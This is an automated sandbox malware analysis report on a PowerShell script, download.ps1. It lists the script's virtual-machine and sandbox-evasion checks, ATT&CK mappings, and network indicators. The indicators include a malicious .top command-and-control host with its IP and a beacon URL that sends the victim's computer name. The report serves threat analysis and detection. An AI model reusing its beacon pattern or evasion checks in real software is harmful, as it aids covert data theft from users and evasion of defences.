Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 | source: powershell.exe, 00000000.00000002.2151284254.000002931C8D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll | source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb | source: powershell.exe, 00000000.00000002.2192157948.0000029336EEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ | source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdbO | source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv | source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- | source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbalidateNotNuR | source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice6 | source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000000.00000002.2151284254.000002931C957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb | source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL | source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848D4D2A5 pushad ; iretd 0_2_00007FF848D4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848E67523 push ebx; iretd 0_2_00007FF848E6756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848E64FA5 push edi; ret 0_2_00007FF848E64FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5983
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3888
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436 | Thread sleep time: -922337203685477s >= -30000s
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware`SZ
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine`SZ
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
MITRE ATT&CK matrix (one row per tactic; the number in parentheses is the signature count the report shows next to a technique):

| Tactic | Technique 1 | Technique 2 | Technique 3 | Technique 4 | Technique 5 | Technique 6 |
|---|---|---|---|---|---|---|
| Reconnaissance | Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties |
| Resource Development | Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet |
| Initial Access | Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media |
| Execution | Windows Management Instrumentation (2) | PowerShell (1) | At | Cron | Launchd | Scheduled Task |
| Persistence | DLL Side-Loading (1) | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts |
| Privilege Escalation | Process Injection (1) | DLL Side-Loading (1) | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts |
| Defense Evasion | Virtualization/Sandbox Evasion (121) | Process Injection (1) | Obfuscated Files or Information (1) | DLL Side-Loading (1) | Software Packing | Steganography |
| Credential Access | OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials |
| Discovery | Security Software Discovery (21) | Process Discovery (1) | Virtualization/Sandbox Evasion (121) | Application Window Discovery (1) | File and Directory Discovery (1) | System Information Discovery (11) |
| Lateral Movement | Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC |
| Collection | Archive Collected Data (1) | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture |
| Command and Control | Encrypted Channel (1) | Ingress Tool Transfer (1) | Non-Application Layer Protocol (2) | Application Layer Protocol (12) | Fallback Channels | Multiband Communication |
| Exfiltration | Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits |
| Impact | Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| download.ps1 | 5% | ReversingLabs | Win32.Trojan.Generic |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://crl.microsoft$T5 | 0% | Avira URL Cloud | safe |
| https://0.google.com/ | 0% | Avira URL Cloud | safe |
| http://bfhdkgmmhdbikgj.top | 0% | Avira URL Cloud | safe |
| https://0.google | 0% | Avira URL Cloud | safe |
| http://wwwft.com/p/Mic | 0% | Avira URL Cloud | safe |
| http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=527 | 0% | Avira URL Cloud | safe |
| http://0.google.com/ | 0% | Avira URL Cloud | safe |
| http://0.google. | 0% | Avira URL Cloud | safe |
| http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| bfhdkgmmhdbikgj.top | 45.61.136.138 | true | true | | unknown |
| www.google.com | 142.250.186.36 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527 | true | Avira URL Cloud: safe | unknown |
| http://www.google.com/ | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://www.google.com/intl/en/about/products?tab=wh | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/url?q=https://www.google.com/maps/search/electronics%2Brecycling%2Bnear%2Bme% | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schema.org/WebPage | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320B5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209F1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://0.google.com/ | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://crl.microsoft$T5 | powershell.exe, 00000000.00000002.2189658899.0000029336A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://crl.microso | powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://wwwft.com/p/Mic | powershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schema.org/WebPageX | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://apis.google.com | powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://bfhdkgmmhdbikgj.top | powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/Icon | powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://0.google | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=527 | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.google.com/preferences?hl=en | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://0.google. | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://0.google.com/ | powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.186.36 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 45.61.136.138 | bfhdkgmmhdbikgj.top | United States | 40676 | AS40676US | true |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584946
Start date and time: 2025-01-06 20:01:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
